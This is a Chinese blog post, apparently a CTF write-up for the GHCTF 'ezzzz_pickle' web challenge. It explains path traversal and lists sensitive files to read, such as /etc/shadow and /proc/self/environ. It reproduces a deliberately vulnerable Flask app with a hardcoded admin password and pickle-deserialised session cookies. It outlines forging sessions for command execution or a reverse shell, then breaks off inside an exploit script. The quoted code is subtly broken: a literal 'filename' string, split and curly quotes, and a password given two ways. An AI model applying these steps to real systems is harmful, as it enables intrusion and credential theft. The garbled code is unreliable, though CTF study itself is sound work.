
  <!DOCTYPE html>
  <html lang="en"  
    
      data-theme-mode="auto"
    
  >
  <head>
  
  <meta charset="utf-8">
  

  

  

  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_4k4bc36ef96';window.REIMU_CONFIG.clipboard_tips = {"success":{"en":"Copy successfully (*^▽^*)"},"fail":{"en":"Copy failed (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = 'All articles on this blog are licensed under the BY-NC-SA license agreement unless otherwise stated. Please indicate the source when reprinting!';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://chq576.github.io';</script>
  
  <title>
    GHCTF |
    
    江之岛
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  
  
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_4k4bc36ef96.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  
    <meta name="description" content="ezzzz_pickle任意文件读取 漏洞的本质是：Web应用在处理文件路径时，没有对用户输行严格的校验和过滤，导致攻击者可以通过构造特殊路径（如 ..&#x2F; ）来突破应用的访问限制，访问到预期之外的文件。   问题：os.path.join(“static”, filename) 未过滤..&#x2F;等路径跳转字符，导致攻击者可构造路径读取任意文件。  123def dowload_fi">
<meta property="og:type" content="article">
<meta property="og:title" content="GHCTF">
<meta property="og:url" content="https://chq576.github.io/2026/01/28/GHCTF/index.html">
<meta property="og:site_name" content="江之岛">
<meta property="og:description" content="ezzzz_pickle任意文件读取 漏洞的本质是：Web应用在处理文件路径时，没有对用户输行严格的校验和过滤，导致攻击者可以通过构造特殊路径（如 ..&#x2F; ）来突破应用的访问限制，访问到预期之外的文件。   问题：os.path.join(“static”, filename) 未过滤..&#x2F;等路径跳转字符，导致攻击者可构造路径读取任意文件。  123def dowload_fi">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-01-28T13:08:37.000Z">
<meta property="article:modified_time" content="2026-01-30T16:25:07.903Z">
<meta property="article:author" content="cc">
<meta property="article:tag" content="章鱼哥喜欢海绵宝宝">
<meta name="twitter:card" content="summary">
  
  
    <link rel="alternate" href="/atom.xml" title="江之岛" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload&#x3D;null;this.rel&#x3D;&#39;stylesheet&#39;" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL&#x2F;toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx&#x2F;1oA&#x2F;0l8ysE" crossorigin="anonymous">
  
    
      
        
<link rel="stylesheet" href="https://npm.webcache.cn/katex@0.16.24/dist/katex.min.css" integrity="sha384-tTgKLjMYmJr94v8qu2PE5MUGSMbyN2xiH266JUB3gpm8vnnJywd1dWSOEfrFz+YI" crossorigin="anonymous">

      
    
  
  
  
  
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

  
  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

  
  
  
<meta name="generator" content="Hexo 8.0.0"></head>

  <body>
    
    
  <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
        
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
        
      </div>
      
      
        
      
      <div class="loading-word">Loading...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
    
      
        <a class="main-nav-link-wrap" href="/">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <span class="main-nav-link">Home</span>
        </span>
      
        <a class="main-nav-link-wrap" href="/archives">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <span class="main-nav-link">Archives</span>
        </span>
      
        <a class="main-nav-link-wrap" href="/about">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <span class="main-nav-link">About</span>
        </span>
      
        <a class="main-nav-link-wrap" href="/friend">
          <div class="main-nav-icon icon rotate">
             
              &#xe62b;
             
          </div>
          <span class="main-nav-link">Friend</span>
        </span>
      
    
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" aria-label="RSS Feed" target="_blank"></a>
    
    
  </nav>
  
  
</div>
<header id="header" aria-label="Site header">
  
    
      
        <picture></picture>
        <img crossorigin="anonymous" fetchpriority="high" src="/images/yh.jpg" alt="GHCTF">
      
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <span id="logo">
            <h1 data-aos="slide-up">GHCTF</h1>
          </span>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content" class="sidebar-left"  >
          <aside id="sidebar" aria-label="Sidebar">
  
  <div class="sidebar-wrapper-container sticky">
  
    
    
  
 
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
  
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ezzzz-pickle"><span class="toc-number">1.</span> <span class="toc-text">ezzzz_pickle</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="toc-number">1.1.</span> <span class="toc-text">任意文件读取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A"><span class="toc-number">1.2.</span> <span class="toc-text">目录穿越</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.3.</span> <span class="toc-text">内存马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WP"><span class="toc-number">1.4.</span> <span class="toc-text">WP</span></a></li></ol></li></ol>
  
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/jn.jpg" data-sizes="auto" alt="cc" class="lazyload">
  <div class="sidebar-author-name">cc</div>
  <div class="sidebar-description">章鱼哥喜欢海绵宝宝</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">3</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-icon icon rotate">
          
            &#xe62b;
          
        </div>
        <div class="sidebar-menu-link">Friend</div>
      </div>
    
  
</div>
</div>
        
      
      
        
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
        
      
    </div>
  </div>
  
  <div class="sidebar-widget">
  
  </div>
  
  </div>
  
</aside>

          <section id="main" aria-label="Main content"><article id="post-GHCTF" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-01-28T13:08:37.000Z" itemprop="datePublished">2026-01-28</time>
    <time style="display: none;" id="post-update-time">2026-01-31</time>
  </span>
  
</div>

      

    </div>
    
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
      
        <h1 id="ezzzz-pickle"><a href="#ezzzz-pickle" class="headerlink" title="ezzzz_pickle"></a>ezzzz_pickle</h1><h2 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h2><ol>
<li>漏洞的本质是：<strong>Web应用在处理文件路径时，没有对用户输行严格的校验和过滤</strong>，导致攻击者可以通过构造特殊路径（如 ..&#x2F; ）来突破应用的访问限制，访问到预期之外的文件。</li>
</ol>
<ul>
<li>问题：os.path.join(“static”, filename) 未过滤..&#x2F;等路径跳转字符，导致攻击者可构造路径读取任意文件。</li>
</ul>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">dowload_file</span>(<span class="params">filename</span>):</span><br><span class="line">    path=os.path.join(<span class="string">&quot;</span></span><br><span class="line"><span class="string">    static&quot;</span>,<span class="string">&quot;filename&quot;</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li>示例：<br>若用户传入filename&#x3D;..&#x2F;app.py，则实际路径为static&#x2F;..&#x2F;app.py，即读取服务器根目录下的app.py文件。</li>
<li>利用条件：需先通过登录获取会话（session），但admin账号密码已知（admin&#x2F;admin123）。</li>
<li>任意文件读取修复：<br>过滤filename中的..&#x2F;、&#x2F;等字符，或使用绝对路径限制：</li>
</ul>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">dowload_file</span>(<span class="params">filename</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;..&quot;</span> <span class="keyword">in</span> filename <span class="keyword">or</span> <span class="string">&quot;/&quot;</span> <span class="keyword">in</span> filename:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Invalid filename&quot;</span></span><br><span class="line">    path = os.path.join(<span class="string">&quot;static&quot;</span>, filename)</span><br><span class="line">    <span class="comment"># ... 后续逻辑</span></span><br></pre></td></tr></table></figure>
<ol start="2">
<li>典型利用方式</li>
</ol>
<ul>
<li><p>读取系统敏感文件<br> 在CTF或渗透测试中，这是最常见的目标：</p>
</li>
<li><p>Linux系统： &#x2F;etc&#x2F;passwd （用户列表）、 &#x2F;etc&#x2F;shadow （密码哈希）、 &#x2F;proc&#x2F;self&#x2F;environ （进程环境变量）</p>
</li>
<li><p>Windows系统： C:\Windows\system32\drivers\etc\hosts 、 C:\Windows\win.ini </p>
</li>
<li><p>Web配置： &#x2F;var&#x2F;www&#x2F;html&#x2F;config.php 、 &#x2F;app&#x2F;.env （环境变量文件）</p>
</li>
<li><p>读取源代码<br>攻击者可以读取Web应用的源代码，进一步发现其他漏洞：<br>plaintext<br><a target="_blank" rel="noopener" href="http://example.com/read?path=../app.py(/app/app.py)">http://example.com/read?path=../app.py(/app/app.py)</a><br>拿到源码后，就可以分析出 pickle 反序列化、命令执行等更严重的漏洞。</p>
</li>
<li><p>配合其他漏洞<br>任意文件读取常常是后续攻击的跳板：</p>
</li>
<li><p>读取到Flask的 SECRET_KEY 后，就可以伪造Session，进行 pickle 反序列化攻击</p>
</li>
<li><p>读取到数据库配置文件后，就可以直接连接数据库窃取数据</p>
</li>
</ul>
<h2 id="目录穿越"><a href="#目录穿越" class="headerlink" title="目录穿越"></a>目录穿越</h2><table>
<thead>
<tr>
<th>字符</th>
<th>含义</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>.</td>
<td>当前目录</td>
<td>表示“就在当前文件夹下”</td>
</tr>
<tr>
<td>..</td>
<td>上级目录</td>
<td>表示“回到上一级文件夹”</td>
</tr>
<tr>
<td>.&#x2F;</td>
<td>当前目录简写</td>
<td><code>./1.txt</code> &#x3D; <code>1.txt</code></td>
</tr>
<tr>
<td>..&#x2F;</td>
<td>上级目录简写</td>
<td><code>../1.txt</code> 表示上一级目录下的 1.txt</td>
</tr>
</tbody></table>
<p>基础示例（Linux系统）：</p>
<ul>
<li>当前路径： &#x2F;var&#x2F;www&#x2F;html&#x2F; </li>
<li> .&#x2F;static  → 解析为  &#x2F;var&#x2F;www&#x2F;html&#x2F;static （当前目录下的static）</li>
<li> ..&#x2F;config  → 解析为  &#x2F;var&#x2F;www&#x2F;config （上一级目录下的config）</li>
<li> ..&#x2F;..&#x2F;etc  → 解析为  &#x2F;etc （跳两级到根目录下的etc）</li>
</ul>
<h2 id="内存马"><a href="#内存马" class="headerlink" title="内存马"></a>内存马</h2><h2 id="WP"><a href="#WP" class="headerlink" title="WP"></a>WP</h2><ol>
<li>先用弱口令爆破：admin&#x2F;admin23</li>
<li>抓包，发现任意文件读取漏洞，由于无法直接读取flag的内容，所以尝试读取源码（app&#x2F;app.py）<br>源码如下</li>
</ol>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, redirect, make_response,render_template </span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives.ciphers <span class="keyword">import</span> Cipher, algorithms, modes</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.backends <span class="keyword">import</span> default_backend</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives <span class="keyword">import</span> padding</span><br><span class="line"><span class="keyword">import</span> pickle <span class="comment">#python自带的序列化模板，反序列化时可以执行任意代码</span></span><br><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="comment">#密钥与IV生成，从系统环境变量中读取 AES 加密的  key  和  iv 。</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_key_iv</span>():</span><br><span class="line">    key = os.environ.get(<span class="string">&quot;SECRET_key&quot;</span>).encode()</span><br><span class="line">    iv = os.environ.get(<span class="string">&quot;SECRET_iv&quot;</span>).encode()</span><br><span class="line">    <span class="keyword">return</span> key, iv</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#AES加解密函数</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">aes_encrypt_decrypt</span>(<span class="params">data, key, iv, mode=<span class="string">&quot;encrypt&quot;</span></span>):</span><br><span class="line">    <span class="comment">#创建加密/解密器</span></span><br><span class="line">    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> mode == <span class="string">&quot;encrypt&quot;</span>:</span><br><span class="line">        encryptor = cipher.encryptor()</span><br><span class="line">        <span class="comment">#数据填充</span></span><br><span class="line">        padder = padding.PKCS7(algorithms.AES.block_size).padder()</span><br><span class="line">        padded_data = padder.update(data.encode()) + padder.finalize()</span><br><span class="line">        result = encryptor.update(padded_data) + encryptor.finalize()</span><br><span class="line">        <span class="keyword">return</span> base64.b64encode(result).decode()  <span class="comment">#数据加密(Base64编码)</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">elif</span> mode == <span class="string">&quot;decrypt&quot;</span>:</span><br><span class="line">        decryptor = cipher.decryptor()</span><br><span class="line">        <span class="comment">#解密数据</span></span><br><span class="line">        encrypted_data_bytes = base64.b64decode(data)</span><br><span class="line">        decrypted_data = decryptor.update(encrypted_data_bytes) + decryptor.finalize()</span><br><span class="line">        <span class="comment">#去除填充</span></span><br><span class="line">        unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder()</span><br><span class="line">        unpadded_data = unpadder.update(decrypted_data) + unpadder.finalize()</span><br><span class="line">        <span class="keyword">return</span> unpadded_data.decode()</span><br><span class="line"></span><br><span class="line">users = &#123;</span><br><span class="line">    <span class="string">&quot;admin&quot;</span>: <span class="string">&quot;admin123&quot;</span>,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_session</span>(<span class="params">username</span>):</span><br><span class="line"></span><br><span class="line">    session_data = &#123;</span><br><span class="line">        <span class="string">&quot;username&quot;</span>: username,</span><br><span class="line">        <span class="string">&quot;expires&quot;</span>: time.time() + <span class="number">3600</span>  <span class="comment">#1hour后过期</span></span><br><span class="line">    &#125;</span><br><span class="line">    pickled = pickle.dumps(session_data)<span class="comment">#pickle.dumps(obj) ：将对象  obj  序列化为二进制字符串（bytes类型），返回该二进制数据，不写入文件。</span></span><br><span class="line">    pickled_data = base64.b64encode(pickled).decode(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line"></span><br><span class="line">    key,iv=generate_key_iv()</span><br><span class="line">    session=aes_encrypt_decrypt(pickled_data, key, iv,mode=<span class="string">&quot;encrypt&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> session</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dowload_file</span>(<span class="params">filename</span>):</span><br><span class="line">    path=os.path.join(<span class="string">&quot;</span></span><br><span class="line"><span class="string">    static&quot;</span>,<span class="string">&quot;filename&quot;</span>)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(path, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data=f.read().decode(“utf-<span class="number">8</span>”)</span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">validate_session</span>(<span class="params">cookie</span>):</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        key, iv = generate_key_iv()</span><br><span class="line">        pickled = aes_encrypt_decrypt(cookie, key, iv,mode=<span class="string">&quot;decrypt&quot;</span>)</span><br><span class="line">        pickled_data=base64.b64decode(pickled)</span><br><span class="line"></span><br><span class="line">        <span class="comment">#ickle.loads(data) ：将二进制字符串  data （bytes类型）反序列化为原Python对象，返回该对象，不读取文件。</span></span><br><span class="line">        session_data = pickle.loads(pickled_data)</span><br><span class="line">        <span class="keyword">if</span> session_data[<span class="string">&quot;username&quot;</span>] !=<span class="string">&quot;admin&quot;</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">        <span class="comment"># 检查过期时间</span></span><br><span class="line">        <span class="keyword">return</span> session_data <span class="keyword">if</span> session_data[<span class="string">&quot;expires&quot;</span>] &amp;gt; time.time() <span class="keyword">else</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span>,methods=[<span class="string">&quot;GET&quot;</span>,<span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;session&quot;</span> <span class="keyword">in</span> request.cookies:</span><br><span class="line">        session = validate_session(request.cookies[<span class="string">&quot;session&quot;</span>])</span><br><span class="line">        <span class="keyword">if</span> session:</span><br><span class="line">            data=<span class="string">&quot;&quot;</span>;</span><br><span class="line">            filename=request.form.get(<span class="string">&quot;filename&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span>(filename):</span><br><span class="line">                data=dowload_file(filename)</span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&amp;&quot;</span>,name=session[<span class="string">&quot;username&quot;</span>],file_data=data)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> redirect(<span class="string">&quot;/login&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/login&quot;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">        username = request.form.get(<span class="string">&quot;username&quot;</span>)</span><br><span class="line">        password = request.form.get(<span class="string">&quot;password&quot;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> users.get(username) == password:</span><br><span class="line">            resp = make_response(redirect(<span class="string">&quot;/&quot;</span>))</span><br><span class="line"></span><br><span class="line">            resp.set_cookie(<span class="string">&quot;session&quot;</span>, create_session(username))</span><br><span class="line">            <span class="keyword">return</span> resp</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;login.html&quot;</span>,error=<span class="string">&quot;Invalid username or password&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;login.html&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/logout&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line">    resp = make_response(redirect(<span class="string">&quot;/login&quot;</span>))</span><br><span class="line">    resp.delete_cookie(<span class="string">&quot;session&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> resp</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;0.0.0.0&quot;</span>,debug=<span class="literal">False</span>)</span><br></pre></td></tr></table></figure>
<p>通过源码可以发现其session是通过<strong>pickle 序列化</strong>字典然后<strong>base64编码</strong>再<strong>AES加密在编码</strong>的结果，验证⽤<br>户时session解码的过程也是<strong>base64解码AES解码base64解码pickle反序列化</strong>。那么我们只要能够获得这个加解密的key和iv就可以伪造出session从⽽控制pickle反序列化的内容，进⾏命令执⾏。⽽key和iv是从环境变量⾥读出来的。我们可以<strong>读取&#x2F;proc&#x2F;self&#x2F;environ来得到key和iv</strong>。进⽽命令执⾏。因为⽆回显我们可以直接打<strong>内存⻢</strong>，或者<strong>弹shell</strong>或者<strong>写⽂件</strong></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives.ciphers <span class="keyword">import</span> Cipher, algorithms, mod</span><br><span class="line">es</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.backends <span class="keyword">import</span> default_backend</span><br><span class="line"><span class="keyword">from</span> cryptography.hazmat.primitives <span class="keyword">import</span> padding</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">aes_encrypt_decrypt</span>(<span class="params">data, key, iv, mode=<span 